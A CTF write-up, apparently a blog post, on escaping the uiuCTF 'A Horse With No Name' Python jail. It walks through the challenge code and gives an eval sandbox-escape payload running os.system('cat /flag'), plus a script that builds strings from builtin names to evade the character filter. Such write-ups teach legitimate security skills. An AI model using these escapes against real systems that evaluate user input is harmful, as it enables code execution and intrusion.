I was reading these CTF writeups and I saw this one which was about python jails. where the attacker has to execute python statements using eval
function. but there is so much learning here about python language and its libraries etc. The CTF event was uiuCTF and the challenge name was A Horse With No Name
( reference).
You may find this article a little hard to understand because I will go too deep into Python to explain every single aspect of this challenge, and every single statement written for this challenge which is making this Python jail for the user.
we are given two files for this challenge. the first one is a Dockerfile.
FROM ubuntu:20.04 as chroot
RUN apt-get update && apt-get install -y python3 && rm -rf /var/lib/apt/lists/*
RUN /usr/sbin/useradd --no-create-home -u 1000 user
COPY flag.txt /
COPY desert.py /home/user/
FROM gcr.io/kctf-docker/challenge@sha256:d884e54146b71baf91603d5b73e563eaffc5a42d494b1e32341a5f76363060fb
COPY --from=chroot / /chroot
COPY nsjail.cfg /home/user/
CMD kctf_setup && \
kctf_drop_privs \
socat \
TCP-LISTEN:1337,reuseaddr,fork \
EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /bin/python3 /home/user/desert.py"
in Dockerfile, I can see that the docker image will have a user with a home directory. and a COPY command is being used to copy `flag.txt` to the root directory of the container.
The second file is desert.py
which is the main challenge. let’s take a look at this challenge.
#!/usr/bin/python3
import re
import random
horse = input("Begin your journey: ")
if re.match(r"[a-zA-Z]{4}", horse):
print("It has begun raining, so you return home.")
elif len(set(re.findall(r"[\W]", horse))) > 4:
print(set(re.findall(r"[\W]", horse)))
print("A single horse cannot bear the weight of all those special characters. You return home.")
else:
discovery = list(eval(compile(horse, "<horse>", "eval").replace(co_names=())))
random.shuffle(discovery)
print("You make it through the journey, but are severely dehydrated. This is all you can remember:", discovery)
the python jail seems so minimal but there is so much hidden in these few lines. we have imported two libraries to use `re` and `random`. our input is being taken using python’s inbuilt input
function. Then comes the conditions in which `re` lib is being used.
The first condition is `re.match(r"[a-zA-Z]{4}", horse):
`. I can try the same thing in my python interpreter.
11:59:30 root@NeverMind ~ → python3
Python 3.10.5 (main, Jun 8 2022, 09:26:22) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import re
>>> horse = "1234"
>>> re.match(r"[a-zA-Z]{4}", horse)
>>> a = re.match(r"[a-zA-Z]{4}", horse)
>>> print(a)
None
>>> horse = "abcd"
>>> a = re.match(r"[a-zA-Z]{4}", horse)
>>> print(a)
<re.Match object; span=(0, 4), match='abcd'>
>>>
The regex `[a-zA-Z]{4}
` is checking whether a 4 chars long string is there in starting without any symbols or numbers in the input. for example, “abcd” or “EFGH” etc. if it finds a string it creates a re.Match object which means the true condition and when it doesn’t it returns None which means false. basically, we don’t wanna follow this condition because we have this if-else ladder in the program where only a single condition’s statement executes.
we could easily bypass it by adding a number or a symbol.
09:41:18 root@NeverMind tmp → python3 desert.py
Begin your journey: kingping
It has begun raining, so you return home.
09:42:58 root@NeverMind tmp → python3 desert.py
Begin your journey: 1kingping
Traceback (most recent call last):
File "/tmp/desert.py", line 11, in <module>
discovery = list(eval(compile(horse, "<horse>", "eval").replace(co_names=())))
File "<horse>", line 1
1kingping
^
SyntaxError: invalid decimal literal
As you can see when we did `kingping` the re lib finds the match and executes the condition. but when we append 1 to it, the condition gets false.
the second condition `len(set(re.findall(r”[\W]”, horse)) > 4` counts non alphabetical chars (\W). and if the chars are more than 4 it will exit us out with a string. but the thing to notice here is `set` function is being used. which means it will make a set of all findings of re.Match. and we all know the property of the set. if there are two or more same chars, a set will never repeat the same char again. which means we are limited to using some chars. Â and keep one thing in mind, `_` char doesn’t fall under `\W`.
let’s say we somehow bypass both these conditions and move to the else block of the code. And that’s where the evil function eval exists. and before that function compile is being used. the mode of compilation is `eval` (can be seen in the argument), which means it wants us to make a single expression that will be executed by the eval function. that might be easy since it is python, we can do a lot in one line (single expression) in Python. The most common example is list comprehension with an if-else condition. you can read more about compile function here.
But try to understand this, we are replacing the co_names of the compiled code using .replace method. But the question is what is it?
>>> a = compile("print(10)", '', 'eval')
>>> type(a)
<class 'code'>
>>> a.co_names
('print',)
>>>
Hmm, interesting method. so we are replacing our function names tuple with empty tuple. if you google about co_names for compile function, you will find that it won’t contain the local function names (used inside a class or a function). and we know that we can create a single line function (due to eval in compile function) using lambda keyword in Python.
>>> a = compile("lambda:print(10)", '', 'eval')
>>> a.co_names
()
>>>
Now we can make our one-line payload without semi-colon `;`. and before we do that I want to explain something else first. if you have studied any Programming Language thoroughly, you must know about the scope of variables/attributes/instances. we have a similar concept in Python. you must have seen that if you try to access some variable of a function outside of that function, you will see an error. Actually, we have 4 scopes in python,
- Local scope
- Enclosing (or nonlocal) scope
- Global scope
- Builtin scope
The main scope you need to focus on right now is the Builtin scope. It is gonna explain our payload. whenever you run a python program or just an interpreter, this scope of python will automatically be defined for that python process. Actually `builtins` is a module/library which is automatically loaded when a python program starts. It contains all your pre-defined functions & Exceptions etc. you are not supposed to write into it. the developer works with the other three scopes. But we can use it in our payload to make it a one-liner. read more
Look at this payload:
(lambda: __builtins__.__import__("os").system("cat /flag"))()
so, we are using __builtins__ here to import the os module. and we are using its system method in the same line. And all this is happening inside a lambda function or we can say an anonymous lambda function (maybe it is a thing in Python also). the last two parentheses to call the function immediately.
Begin your journey: (lambda: __builtins__.__import__("os").system("cat /flag"))()
{'"', ':', ')', '.', ' ', '/', '('}
A single horse cannot bear the weight of all those special characters. You return home.
so, the second condition triggers when we don’t want it to. it says that we cannot use more than 4 special symbols or non-alphabetic words + ‘_’.
Okay so, we cannot ignore opening and closing parenthesis `()` and the same thing with column `:`. we can get rid of space ` `. and we must remove the quote `”` also. then left working chars will be:
( ) . /
To remove these quotes we can use a method of any function in Python.
>>> open.__name__.__getitem__(0)
'o'
>>> open.__name__.__getitem__(1)
'p'
>>> open.__name__.__getitem__(2)
'e'
>>> open.__name__.__getitem__(3)
'n'
>>>
This way you can get the char present in the function name and use it as you need. and since there is no extra non-alphabetical char, we can use it in our payload. and in order to generate strings this way, there is this script you can use.
def generator(cmd):
# Make sure to use the same python version as the target when building the mapping
# (because the __doc__ might change accross versions)
# Target uses Python 3.8.10
mapping = {
'o': "open.__name__.__getitem__(0)",
's': "set.__name__.__getitem__(0)",
'c': "chr.__name__.__getitem__(0)",
'h': "hash.__name__.__getitem__(0)",
'e': "eval.__name__.__getitem__(0)",
'a': "abs.__name__.__getitem__(0)",
'd': "divmod.__name__.__getitem__(0)",
'f': "float.__name__.__getitem__(0)",
'l': "list.__name__.__getitem__(0)",
'g': "globals.__name__.__getitem__(0)",
't': "type.__name__.__getitem__(0)",
'x': "hex.__name__.__getitem__(2)",
' ': "str(hash).__getitem__(9)",
'-': "str(hash).__getitem__(6)",
'.': "hash.__doc__.__getitem__(151)",
'1': "dict.__doc__.__getitem__(361)",
'/': "divmod.__doc__.__getitem__(20)",
}
for k,v in mapping.items():
assert(k == eval(v))
payload=''
for ch in cmd:
encoded_ch = mapping[ch]
if len(payload) == 0:
payload = encoded_ch
else:
payload += f".__add__({encoded_ch})"
assert(eval(payload) == cmd)
return payload
horse = f"(lambda:__builtins__.__import__({generator('os')}).system({generator('cat /flag.txt')}))()"
print(horse)
And that how you bypass a Python Jail.